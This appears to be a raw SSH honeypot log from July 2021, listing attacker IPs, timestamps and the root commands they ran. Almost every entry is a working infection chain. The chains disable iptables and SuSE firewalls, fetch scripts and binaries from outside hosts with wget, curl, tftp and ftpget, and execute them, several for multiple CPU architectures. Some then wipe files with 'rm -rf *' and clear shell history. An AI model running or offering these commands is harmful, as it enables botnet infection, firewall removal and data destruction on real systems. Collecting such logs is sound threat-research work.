Exec cd /tmp || cd /run || cd /; wget http://205.185.126.121/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 205.185.126.121 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 205.185.126.121; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://205.185.126.121/Ciabins.sh
chmod 777 Ciabins.sh
sh Ciabins.sh
tftp 205.185.126.121 -c get Ciatftp1.sh
chmod 777 Ciatftp1.sh
sh Ciatftp1.sh
tftp -r Ciatftp2.sh -g 205.185.126.121
chmod 777 Ciatftp2.sh
sh Ciatftp2.sh
rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh
rm -rf *

From 209.141.32.204 7-Jul-2021 11:34:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/Oblivion121.sh; curl -O http://205.185.126.121/Oblivion121.sh; chmod 777 Oblivion121.sh; sh Oblivion121.sh; tftp 205.185.126.121 -c get tOblivion121.sh; chmod 777 tOblivion121.sh; sh tOblivion121.sh; tftp -r tOblivion1212.sh -g 205.185.126.121; chmod 777 tOblivion1212.sh; sh tOblivion1212.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh; sh Oblivion1211.sh; rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/Oblivion121.sh
curl -O http://205.185.126.121/Oblivion121.sh
chmod 777 Oblivion121.sh
sh Oblivion121.sh
tftp 205.185.126.121 -c get tOblivion121.sh
chmod 777 tOblivion121.sh
sh tOblivion121.sh
tftp -r tOblivion1212.sh -g 205.185.126.121
chmod 777 tOblivion1212.sh
sh tOblivion1212.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh
sh Oblivion1211.sh
rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/Oblivion121.sh; curl -O http://205.185.126.121/Oblivion121.sh; chmod 777 Oblivion121.sh; sh Oblivion121.sh; tftp 205.185.126.121 -c get tOblivion121.sh; chmod 777 tOblivion121.sh; sh tOblivion121.sh; tftp -r tOblivion1212.sh -g 205.185.126.121; chmod 777 tOblivion1212.sh; sh tOblivion1212.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh; sh Oblivion1211.sh; rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/Oblivion121.sh
curl -O http://205.185.126.121/Oblivion121.sh
chmod 777 Oblivion121.sh
sh Oblivion121.sh
tftp 205.185.126.121 -c get tOblivion121.sh
chmod 777 tOblivion121.sh
sh tOblivion121.sh
tftp -r tOblivion1212.sh -g 205.185.126.121
chmod 777 tOblivion1212.sh
sh tOblivion1212.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh
sh Oblivion1211.sh
rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh
rm -rf *

From 209.141.32.204 7-Jul-2021 14:26:10 ssh2 root
Exec uname -a
uname -a
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 7-Jul-2021 16:36:12 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/Oblivion121.sh; curl -O http://205.185.126.121/Oblivion121.sh; chmod 777 Oblivion121.sh; sh Oblivion121.sh; tftp 205.185.126.121 -c get tOblivion121.sh; chmod 777 tOblivion121.sh; sh tOblivion121.sh; tftp -r tOblivion1212.sh -g 205.185.126.121; chmod 777 tOblivion1212.sh; sh tOblivion1212.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh; sh Oblivion1211.sh; rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/Oblivion121.sh
curl -O http://205.185.126.121/Oblivion121.sh
chmod 777 Oblivion121.sh
sh Oblivion121.sh
tftp 205.185.126.121 -c get tOblivion121.sh
chmod 777 tOblivion121.sh
sh tOblivion121.sh
tftp -r tOblivion1212.sh -g 205.185.126.121
chmod 777 tOblivion1212.sh
sh tOblivion1212.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh
sh Oblivion1211.sh
rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh
rm -rf *

From 209.141.53.60 7-Jul-2021 17:33:39 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/Oblivion121.sh; curl -O http://205.185.126.121/Oblivion121.sh; chmod 777 Oblivion121.sh; sh Oblivion121.sh; tftp 205.185.126.121 -c get tOblivion121.sh; chmod 777 tOblivion121.sh; sh tOblivion121.sh; tftp -r tOblivion1212.sh -g 205.185.126.121; chmod 777 tOblivion1212.sh; sh tOblivion1212.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh; sh Oblivion1211.sh; rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/Oblivion121.sh
curl -O http://205.185.126.121/Oblivion121.sh
chmod 777 Oblivion121.sh
sh Oblivion121.sh
tftp 205.185.126.121 -c get tOblivion121.sh
chmod 777 tOblivion121.sh
sh tOblivion121.sh
tftp -r tOblivion1212.sh -g 205.185.126.121
chmod 777 tOblivion1212.sh
sh tOblivion1212.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh
sh Oblivion1211.sh
rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh
rm -rf *

From 181.214.243.18 8-Jul-2021 07:54:53 ssh2 root
Exec id
id

From 205.185.119.224 8-Jul-2021 14:06:35 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 8-Jul-2021 18:38:58 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 124.156.154.191 9-Jul-2021 01:44:43 ssh2 root
ls bt

From 117.24.13.169 10-Jul-2021 12:02:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/x64;chmod 777 x64;./x64 server;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/x64
chmod 777 x64
./x64 server

From 117.24.13.169 10-Jul-2021 12:03:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/x64;chmod 777 x64;./x64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/x64
chmod 777 x64
./x64 Sever64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/x64;chmod 777 x64;./x64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/x64
chmod 777 x64
./x64 Sever64

From 117.24.13.169 10-Jul-2021 12:06:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/x64;chmod 777 x64;./x64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/x64
chmod 777 x64
./x64 Sever64

From 117.24.13.169 10-Jul-2021 12:22:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:33321/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:33321/txma
chmod 777 txma
./txma
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:33321/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:33321/txma
chmod 777 txma
./txma

From 117.24.13.169 10-Jul-2021 15:59:44 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/X64;chmod 777 X64;./X64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/X64
chmod 777 X64
./X64 Sever64

From 117.24.13.169 10-Jul-2021 16:06:00 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/X64;chmod 777 X64;./X64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/X64
chmod 777 X64
./X64 Sever64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/X64;chmod 777 X64;./X64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/X64
chmod 777 X64
./X64 Sever64

From 117.24.13.169 10-Jul-2021 16:30:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://a9.huhh.cn:81/X64;chmod 777 X64;./X64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://a9.huhh.cn:81/X64
chmod 777 X64
./X64 Sever64

From 117.24.13.169 10-Jul-2021 19:15:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:33321/SSS;chmod 777 SSS;./SSS;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:33321/SSS
chmod 777 SSS
./SSS

From 195.133.40.226 10-Jul-2021 20:52:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://apponline957.ir/vdht.sh; curl -O https://apponline957.ir/vdht.sh; chmod 777 vdht.sh; sh vdht.sh; rm -rf vdht.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget https://apponline957.ir/vdht.sh
curl -O https://apponline957.ir/vdht.sh
chmod 777 vdht.sh
sh vdht.sh
rm -rf vdht.sh
history -c

From 222.186.52.198 11-Jul-2021 07:00:48 ssh2 root
Exec /etc/init.d/iptables stop
/etc/init.d/iptables stop
Exec /etc/init.d/iptables stop
/etc/init.d/iptables stop

From 117.24.13.169 11-Jul-2021 13:52:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/BOT/1;chmod 777 1;./1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/BOT/1
chmod 777 1
./1
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/BOT/1;chmod 777 1;./1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/BOT/1
chmod 777 1
./1

From 180.215.192.123 12-Jul-2021 04:05:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/ABOC;chmod 777 ABOC;./ABOC;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/ABOC
chmod 777 ABOC
./ABOC
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/ABOC;chmod 777 ABOC;./ABOC;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/ABOC
chmod 777 ABOC
./ABOC

From 180.215.192.123 12-Jul-2021 04:09:33 ssh2 root
Exec tc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/linuxdoor;chmod 777 linuxdoor;./linuxdoor;
tc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/linuxdoor
chmod 777 linuxdoor
./linuxdoor
Exec tc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/linuxdoor;chmod 777 linuxdoor;./linuxdoor;
tc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/linuxdoor
chmod 777 linuxdoor
./linuxdoor

From 180.215.192.123 12-Jul-2021 04:27:30 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/linuxdoor;chmod 777 linuxdoor;./linuxdoor;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/linuxdoor
chmod 777 linuxdoor
./linuxdoor
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/linuxdoor;chmod 777 linuxdoor;./linuxdoor;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/linuxdoor
chmod 777 linuxdoor
./linuxdoor

From 180.215.192.123 12-Jul-2021 08:12:14 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/U;chmod 777 U;./U;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/U
chmod 777 U
./U

From 180.215.192.107 13-Jul-2021 01:57:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/aal.6;chmod 777 http://180.215.192.107:8080/aal.6;.http://180.215.192.107:8080/aal.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/aal.6
chmod 777 http://180.215.192.107:8080/aal.6
.http://180.215.192.107:8080/aal.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/aal.6;chmod 777 http://180.215.192.107:8080/aal.6;.http://180.215.192.107:8080/aal.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/aal.6
chmod 777 http://180.215.192.107:8080/aal.6
.http://180.215.192.107:8080/aal.6

From 180.215.192.107 13-Jul-2021 02:01:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Li2.4;chmod 777 Li2.4;./Li2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Li2.4
chmod 777 Li2.4
./Li2.4
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Li2.4;chmod 777 Li2.4;./Li2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Li2.4
chmod 777 Li2.4
./Li2.4

From 179.43.175.9 13-Jul-2021 03:35:59 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.175.12/cometome; cat cometome > meth; chmod +x meth; chmod 777 *; ./meth; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.175.12/cometome
cat cometome > meth
chmod +x meth
chmod 777 *
./meth
history -c

From 180.215.192.107 13-Jul-2021 12:30:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.124.34.136:8080/x862;chmod 777 x862;./x862;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.124.34.136:8080/x862
chmod 777 x862
./x862

From 180.215.192.107 13-Jul-2021 12:32:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.124.34.136:8080/x86;chmod 777 x86;./x86;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.124.34.136:8080/x86
chmod 777 x86
./x86
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.124.34.136:8080/x86;chmod 777 x86;./x86;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.124.34.136:8080/x86
chmod 777 x86
./x86

From 180.215.192.107 13-Jul-2021 12:37:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Li2.4;chmod 777 Li2.4;./Li2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Li2.4
chmod 777 Li2.4
./Li2.4

From 178.138.96.209 13-Jul-2021 17:40:45 ssh2 root
w
lscpu
ps aux
ping yahoo.com
cd /usr/lib
ls -a
ping yahoo.com
wget http://130.0.164.120/scan2.jpg
curl -O http://130.0.164.120/scan2.jpg
yum
ap-tget
apt-get
apt-get install curl
curl -O https://fs03n1.sendspace.com/dl/e6ee48506578b8ada941f5128eea50ce/60edc2220fc0e7ec/6jh0ab/euf.jpg
curl
/srl
find
findapt-get install slocate
apt-get install slocate
locate
ficd /home
ls -a
cd /home
ls -a
ls -a
halt

From 209.141.53.60 13-Jul-2021 22:52:30 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 180.215.192.107 13-Jul-2021 23:25:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/7.6;chmod 777 7.6;./7.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/7.6
chmod 777 7.6
./7.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/7.6;chmod 777 7.6;./7.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/7.6
chmod 777 7.6
./7.6

From 180.215.192.123 14-Jul-2021 09:13:06 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/99.6;chmod 777 99.6;./99.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/99.6
chmod 777 99.6
./99.6

From 180.215.192.123 14-Jul-2021 09:20:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux2.4;chmod 777 Linux2.4;./Linux2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux2.4
chmod 777 Linux2.4
./Linux2.4
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux2.4;chmod 777 Linux2.4;./Linux2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux2.4
chmod 777 Linux2.4
./Linux2.4

From 222.186.52.198 14-Jul-2021 10:07:30 ssh2 root
Exec wget http://66.42.103.186/hang/armv4l;chmod +x armv4l;./armv4l server;wget http://66.42.103.186/hang/armv5l; chmod +x armv5l;./armv5l server;wget http://66.42.103.186/hang/armv7l;chmod +x armv7l;./armv7l server;wget http://66.42.103.186/hang/mips;chmod +x mips;./mips server;wget http://66.42.103.186/hang/mipsel;chmod +x mipsel;./mipsel server;
wget http://66.42.103.186/hang/armv4l
chmod +x armv4l
./armv4l server
wget http://66.42.103.186/hang/armv5l
chmod +x armv5l
./armv5l server
wget http://66.42.103.186/hang/armv7l
chmod +x armv7l
./armv7l server
wget http://66.42.103.186/hang/mips
chmod +x mips
./mips server
wget http://66.42.103.186/hang/mipsel
